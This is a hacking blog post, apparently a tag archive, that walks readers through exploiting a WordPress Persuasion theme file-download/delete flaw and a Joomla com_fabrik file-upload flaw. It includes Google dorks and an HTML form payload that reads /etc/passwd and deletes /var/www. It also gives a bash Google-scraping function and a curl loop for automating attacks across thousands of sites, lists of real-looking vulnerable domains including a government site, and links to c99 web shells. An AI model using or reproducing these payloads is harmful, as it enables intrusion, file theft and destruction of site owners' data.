Tag Archive: inurl


I don’t know why developers around the globe are so much into copy and pasting it before actually checking out things manually?

This is just a standard example where Security Admins/System Admins will be screwed big time.

Tip for Security Admins:

  • Have proper checks and URL Sanitization, any requests to OS files or file that can bring your server down, block that IP.
  • Analyze logs, have automated script to parse logs for malicious request, IP’s.
  • keep yourself updated with latest hacks and vulnerabilities
  • have IDS for any new application installed and check for any vulnerabilities associated with it.

Enough of consultancy!!!

How to exploit?

1. Google Dork,

index:wp-content/themes/persuasion/lib/scripts/dl-skin.php

OR

inurl:wp-content/themes/persuasion/lib/scripts/

1

2. A test domain hosted on a server, mine was testing.com (NOT LIVE), behind TOR 😉

Add below exploit under public_html, say test.html

<html>
<body>
<form action=”http://vulnerable-site.com/wp-content/themes/persuasion/lib/scripts/dl-skin.php&#8221; method=”post”>
Existing file’s name:<input type=”text” name=”_mysite_download_skin” value=”/etc/passwd”><br>
Directory to be removed:<input type=”text” name=”_mysite_delete_skin_zip” value=”/var/www”><font color=red>Use with caution it will delete the files and directories if it is writeable</font><br>
<input type=”submit”  name=press value=”OK”>
</form>
</body>
</html>

 

2

3. you’ll find /etc/passwd downloaded, check /home/ and just delete it by specifying the path in above test box.

3 4

4. Imagine it’s coded and automated,

you can have something like, create a function say, google and search as shown below,

Command:

function google { Q=”$@”; GOOG_URL=’https://www.google.de/search?tbs=li:1&q=&#8217;; AGENT=”Mozilla/4.0″; stream=$(curl -A “$AGENT” -skLm 10 “${GOOG_URL}${Q//\ /+}” | grep -oP ‘\/url\?q=.+?&amp’ | sed ‘s|/url?q=||; s|&amp||’); echo -e “${stream//\%/\x}”; }

Sample Output:

[root@BT]# google inurl:wp-content/themes/persuasion/lib/scripts/ | sed ‘s/scripts.*$/scripts/’ | uniq
http://burlingtonventures.com/wp-content/themes/persuasion/lib/scripts
http://finseafood.com/wp-content/themes/persuasion/lib/scripts
http://www.bydelight.com/wp-content/themes/persuasion/lib/scripts
http://laforceteamwork.com/wp-content/themes/persuasion/lib/scripts
http://www.kismetdallas.com/wp-content/themes/persuasion/lib/scripts
[root@BT]#

Then you can have curl to check the HTTP status code of above searches,

URL=`google inurl:wp-content/themes/persuasion/lib/scripts/ | sed ‘s/scripts.*$/scripts/’`

for STATUS in $URL
do
HTTP_STATUS_CODE=`curl -s -o /dev/null -I -w “%{http_code}” http://www.bydelight.com/wp-content/themes/persuasion/lib/scripts/dl-skin.php`

if [ “$HTTP_STATUS_CODE” == 200 ];

then

curl command to post data

else

echo “message”

fi

done

curl command used with  formfind can be used to web forms or below command,

[root@BT]# curl –data “_mysite_download_skin=%2Fetc%2Fpasswd&_mysite_delete_skin_zip=%2Fvar%2Fwww&press=%20OK%20” –dump-header headers http://www.testing.com/test.html

If unaware about Curl, you can use FireCurl to get the response of curl command

In no time, you’ll end up bringing down 2k+ websites.

Vulnerable Script: 

Cheers!!!!

Another one , 🙂

we had a recent post https://ustechnica.wordpress.com/category/security/joomla-jce-ecploit/ on one of the Joomla vulnerability.

Joomla’s com_fabrik component gives you the power to create forms and tables that run inside Joomla without requiring knowledge of mySQL and PHP. Then feed your data into Google Maps, Charts or an AJAX based calendar.

but it’s vulnerable 🙂

let’s hit the road,

1. Google Dork : inurl:index.php?option=com_fabrik

if you want to narrow down the search for .com domains or .com.au domains then just append “site:com.au” in above google dork.

Example: inurl:index.php?option=com_fabrik site:com.au (This will serach for com_fabrik vulnerability for .com.au websites)

2. once you have the list of websites,

replace with the link shown below,

http://www.example.com.au/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1

3. you’ll get something like this and you can upload any file,

comfabrik

4. Now upload any file and once succeeded,

access link of  uploaded file,

http://www.example.com.au/media/shell.php (shell.php is the name of the uploaded file)

5. Example of the vulnerable sites,

http://prdbihar.gov.in/index.php?option=com_fabrik&c=import&view=import&filetype=csv&tableid=1

6. you can download one of the below files and can upload through com_fabrik vulnerability,

http://www.2shared.com/file/6yFs_FG_/c99shell.html

http://pastebin.com/tfhHcPE0